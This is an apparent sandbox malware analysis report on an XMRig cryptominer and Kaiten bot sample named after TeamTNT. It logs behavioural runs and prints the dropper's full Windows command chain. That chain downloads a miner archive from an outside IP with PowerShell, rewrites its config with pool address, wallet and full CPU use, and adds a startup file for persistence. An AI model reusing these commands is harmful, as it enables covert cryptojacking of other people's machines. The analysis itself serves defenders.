Malware Analysis Report

2024-12-01 00:48

Sample ID 211029-xtncksafbp
Target SugarLogic_#[email protected]
SHA256 317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8
Tags xmrig evasion miner kaiten
Score 10/10

Analysis Overview

Score 10/10

SHA256 317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8

Threat Level: Known bad

The file SugarLogic_#[email protected] was found to be: Known bad.

Malicious Activity Summary

xmrig evasion miner kaiten

Kaiten family

Identified Kaiten Bot

XMRig Miner Payload

xmrig

Xmrig family

XMRig Miner Payload

Blocklisted process makes network request

Stops running service(s)

Executes dropped EXE

Drops startup file

Launches sc.exe

Kills process with taskkill

Enumerates processes with tasklist

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-10-29 19:09

Signatures

Identified Kaiten Bot

Kaiten family

kaiten

XMRig Miner Payload

miner

Xmrig family

xmrig

Analysis: behavioral4

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-armhf-en-20211025

Max time kernel

0s

Command Line

[/tmp/566148710/payload.dat]

Signatures

N/A

Processes

/tmp/566148710/payload.dat

[/tmp/566148710/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-armhf-en-20211025

Max time kernel

0s

Command Line

[/tmp/128429670/payload.dat]

Signatures

N/A

Processes

/tmp/128429670/payload.dat

[/tmp/128429670/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-mipsel-en-20211025

Max time kernel

0s

Command Line

[/tmp/217523984/payload.dat]

Signatures

N/A

Processes

/tmp/217523984/payload.dat

[/tmp/217523984/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

123s

Max time network

147s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"

Signatures

xmrig

miner xmrig

XMRig Miner Payload

miner

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\moneroocean\xmrig.exe N/A
N/A N/A C:\Users\Admin\moneroocean\xmrig.exe N/A

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moneroocean_miner.bat C:\Windows\system32\cmd.exe N/A

Launches sc.exe

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (30 identical entries)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (10 identical entries)
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\moneroocean\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\moneroocean\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3116 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2272 wrote to memory of 3368 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3116 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3116 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 3116 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 3116 wrote to memory of 528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3116 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3116 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe
PID 3116 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2976 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3516 wrote to memory of 2152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\HOSTNAME.EXE
PID 3116 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3116 wrote to memory of 816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3116 wrote to memory of 3416 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\where.exe

where powershell

C:\Windows\system32\where.exe

where find

C:\Windows\system32\where.exe

where findstr

C:\Windows\system32\where.exe

where tasklist

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Windows\system32\taskkill.exe

taskkill /f /t /im xmrig.exe

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Users\Admin\moneroocean\xmrig.exe

"C:\Users\Admin\moneroocean\xmrig.exe" --help

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"94.130.12.27:3333\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"WinTendo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"

C:\Windows\system32\tasklist.exe

tasklist /fi "imagename eq xmrig.exe"

C:\Windows\system32\find.exe

find ":"

C:\Users\Admin\moneroocean\xmrig.exe

C:\Users\Admin\moneroocean\xmrig.exe --config="C:\Users\Admin\moneroocean\config_background.json"

Network

Country Destination Domain Proto
DE 85.214.149.236:443 85.214.149.236 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 56efdb5a0f10b5eece165de4f8c9d799
SHA1 fa5de7ca343b018c3bfeab692545eb544c244e16
SHA256 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA512 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40ef7db7b590b37dbe14b834480916eb
SHA1 0b48e0e3631424f46ad5ef8d39d93421e9b9c5b6
SHA256 186e56656bb4d26c0866bd16f8737ec01e2c647ea0cc22890caeb12be8cf8e4c
SHA512 7eb9cc596ce3a720a990e35281eb21570b89951af07d3eb4145c23be1e566cfb02c1df77c26101e5e17acaab1f985ef2e0d8b568ddb52db2a5699ababf1985a1

C:\Users\Admin\xmrig.zip

MD5 877492e0bf1e064eef97339fd71990fd
SHA1 3f4988a2b1ca38850b8798974f01cd76815af684
SHA256 17862610ea8190e3ed4d22099d324d9058b15c941ce97236405fc80d3c50d747
SHA512 016fec4d0c9c9ad4ec6de82456bc41b1c59cfcf8c13781ce457b939f44a21b91c68decf02c05f39d4646e4480734b592c3c6753750b21836b231ab87e70f973d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0d66cbceb3ec62c57dd66cc0f4282156
SHA1 f5373d3010118067555c7a4a8ef8817f910b4dfc
SHA256 dc603c5cdd5dd1394df01bcd9279807564149d545d1aca2b4950536dd808f46a
SHA512 dd0a747710e5008f4ac7f5519d40fccb876fcff5ce592f39d25b55d78cf01763cb33a5246afd51f3fdb0518510c7f74eafd424cc1132343957bf3bf74ce1b4d1

C:\Users\Admin\moneroocean\config.json

MD5 bfa626e053028f9adbfaceb5d56086c3
SHA1 acf9d3be3211c8f96b823517ea83888982d498d3
SHA256 c17e1a22b7bc00e591aede9d101b843ff2e47d5b582bb0628406bbd53b7dac78
SHA512 692115d964b98f380c0f45a9e25dc3d22bc53447c1aa76732103e7ac1807459c45348d873dcb0eeb92ca38f9a954f27078a8f4a3508ca5b4b3809a92f02765d0

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb273c9c89cac500fcbadabed98e3375
SHA1 e2563ab7ad20b04b1aa62a9aaf4862be800ae2bf
SHA256 bfa054896268067d7d081d4ff4e1731ad8f88ec92e523ff736137ba75977a8d8
SHA512 ec31170d7279822739a2c45af21df92a32294757bad8bcf3b609e0b489319ad784f706fd1a9db43c9e7a9223b76306420f1a81fdd98fccd856bb62e82d7ddfe1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba8ae666e929aa64d0504993fba65ee9
SHA1 89c35367510d0153cef20bd7d2b31a5470b1e441
SHA256 2baa317c75ad71a43c1873cb2931eed865638179d918c790b900e6fb0873624c
SHA512 2e26fdd7778c15df72c36c9718015d82c6d5c62232f5ea41c11ebf846f84cdc4d48c8c1bce16a76eca995e9c441a7442523b12f794f54f813f347e07beb3be43

C:\Users\Admin\moneroocean\config.json

MD5 2a7d154f3f4a62932f80ea0d62776fb1
SHA1 d8bc14b26073d8da26b3801d5f118c1c2fb9e916
SHA256 8c5e3471399b12cd08552ca3608ef57ebfa6da170d82b6d4ee5c95ed06b902d8
SHA512 64e50e4e45b1ffcd1f0655816541c55440376c87302ad468ec9111d409d0cb0a5ace31fb9ac90e881694eba7906e19175d23a336b2deb3c881555e4940390c23

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1bcb465bafde8c1434b1561ced728749
SHA1 6f08eb9d57100b4876d7346d744fffe928ad6648
SHA256 1db46b71c87b1e38dfd7af6d4dc1003122e1e78f2a24863349419ffdf602e034
SHA512 773ec8962dc5563351acf67a8e2787ec56dbdbc96c62cebb9cb6fb6319ef62614fe0a3823aa02e82f1b46ed3b8d07e6efdf3eb19df05e22397b7ca552a2fcdfc

C:\Users\Admin\moneroocean\config.json

MD5 031168b8b85aa1ff67dbe665e3ea9fd1
SHA1 aa617eab33ad5d776a96bc79ad2c88205ff315b4
SHA256 d021106b60e81826150b4f5e50969cc66c3781c20faab66b8e795ebf938e7b6f
SHA512 32d88ac902f0bfc12085c9d77919c2f31d9bcf574cafe5a82f484c4a5e7c3c5676fa7fc3ffb2687c22b183f59ca80a8d178a3651328bf32a2c6e124bd09c1c0d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a829f9f5ded3f9a1ec326f6a6cab345
SHA1 738e6ce9004d7463811ae2ac8000c701736386ba
SHA256 5348f58a41191272bb3416915d5cd0ef7e8d7333f9c499541439daac6e3a9f31
SHA512 88740d927926c36df4f81f9637bcf45f709330fb27b34bac50838ddc28f8e1a95de88c3c7bba66f360727fa337fa3e53c71c0cfed1cf830e6e65b4d27bed8563

C:\Users\Admin\moneroocean\config.json

MD5 115d22c264f7912e7d02307386db8c53
SHA1 fe96e575df30c6c3b4f1c3a331d6641f7061726e
SHA256 38b5c830e728ac133ac5f8153f48f0e90c74dfdbde73426de2331dde69300c9a
SHA512 0390fd713b7a413eff753f9ab5e3779cf3c0a59b0dbd701e58bae5be222c3ae846dc0605c4802a1851e1e3f371c0baf28560b5bbf98a4131857ee1e0fb864bd8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6ca7324beb2215be243500bc82290706
SHA1 1108f05689bda703ebe065f6dfe9f7bf551b2642
SHA256 307f464ddd8139dc577c3cd42248c146c86004f83c215f324e634852311819e5
SHA512 e15a169632ed6b8745c02af105316acce972c8e9eec1a228492562ba7424e0948692979f7f28b7b536a73a7698c15268c6c260eedd6ea423f757ef1febaeb9d3

C:\Users\Admin\moneroocean\config.json

MD5 c35b704c05e2018ce71f35b4be6d687b
SHA1 7771d19d56d23d3d6f38df5c33a2f162c2b07493
SHA256 53b163495576feeb58a418e067016223e9bcfaec0e3e2b0a7d6636c5c23b51d7
SHA512 7ecfb37d3bf84959b923f9123053456db74016afc36ce29a6a55b5a6e6fe1d6abeff71724d61b1a499f97842fd711c6e2eaa3e7b885541fd3233aff2d2a24191

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8c2b856bb67d0c963bae3a55dabb0c72
SHA1 b17fe6260d16fe6f764c026974d038c703da767d
SHA256 dc9036fd9085a78a911ecd50f441acb6cc2a2f57f3f87cf434da3915dbe4f820
SHA512 c102956e405cba3b8bb9750705f19490414012b1a1178344971378c3bc4c64fb933261a43a557d2b0ecc0c2219daed3ac34fa939eeff5ba87b30b30a5f5efd52

C:\Users\Admin\moneroocean\config.json

MD5 bc60290fa5050425ae4a655f493802aa
SHA1 42df7d9c1e95a7e86c4652b7688d5ea5f03e2c47
SHA256 6d2d16f7f250d2db6686c1db275145944cfefef2bdee67bb263f815e10ca3409
SHA512 6eda5175e9dc409ee2ae09a5050d08cb910395ecbb81262fdfcc42adcdb078febabf40b4dab679d003aaf625f1645f616c56e4926d6ff331f797f5c368bab5f7

C:\Users\Admin\moneroocean\config.json

MD5 05193fd0a7804c0389d4043816400804
SHA1 9dfab5b729c059a690169de942919137643162ff
SHA256 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52
SHA512 cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997

memory/3184-366-0x0000000000000000-mapping.dmp

memory/2512-373-0x000001B2C0BC6000-0x000001B2C0BC8000-memory.dmp

memory/3184-374-0x000002B34BEB0000-0x000002B34BEB2000-memory.dmp

memory/3184-375-0x000002B34BEB3000-0x000002B34BEB5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 33ce3bd4c52bd058a32997d140983eb9
SHA1 463dbf2a6a11f4f8d51ac7aadc6f03047e65f4f6
SHA256 bf3647a6aac8b0ca4da842b7825b004c7d01ba7db097abfc2f842568bdba8b8f
SHA512 38c82103ed33c7ccf6a1773eb36d5838b0b5e7d6289d3a3a69aec2f1b9170f2658399a64fd1d32fb968eb2285ce0f2cc2e9837a940eed6f5ecf7187653ed1539

C:\Users\Admin\moneroocean\config_background.json

MD5 05193fd0a7804c0389d4043816400804
SHA1 9dfab5b729c059a690169de942919137643162ff
SHA256 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52
SHA512 cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997

memory/3288-391-0x0000000000000000-mapping.dmp

memory/816-392-0x0000000000000000-mapping.dmp

memory/3184-393-0x000002B34BEB6000-0x000002B34BEB8000-memory.dmp

memory/3416-394-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

C:\Users\Admin\moneroocean\config_background.json

MD5 8b89a341da7415528c151ae4ab3d851c
SHA1 2b28ff8a983351ab6c73c61bb6e96135fb9368d2
SHA256 c5cbb3a890dd0ac355a4b2928d7dfc0448b53800682401457b1144b77d5339f0
SHA512 1319cd72fbc51c80a5df03ed7f67f737b1acf59eaae195cde72e5d7d33f93c044c65800467e8e10021ab1881df0e22d6d2ca9661fa51f536d09f8f943d6c96e5

memory/3416-398-0x00000000001B0000-0x00000000001B4000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:59

Platform

win10-en-20210920

Max time kernel

110s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\nssm.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\nssm.exe

"C:\Users\Admin\AppData\Local\Temp\nssm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win10-en-20211014

Max time kernel

12s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"

Network

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

121s

Max time network

146s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"

Signatures

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Stops running service(s)

evasion

Launches sc.exe

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
(36 identical entries for powershell.exe)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2720 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3800 wrote to memory of 3956 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2720 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 1168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2720 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2720 wrote to memory of 3460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2720 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe
PID 2720 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 3164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\HOSTNAME.EXE
PID 2720 wrote to memory of 3040 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 4016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe
PID 2720 wrote to memory of 2884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe
PID 2720 wrote to memory of 712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe
(each entry was listed twice in the original report; duplicates collapsed)

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\where.exe

where powershell

C:\Windows\system32\where.exe

where find

C:\Windows\system32\where.exe

where findstr

C:\Windows\system32\where.exe

where tasklist

C:\Windows\system32\where.exe

where sc

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

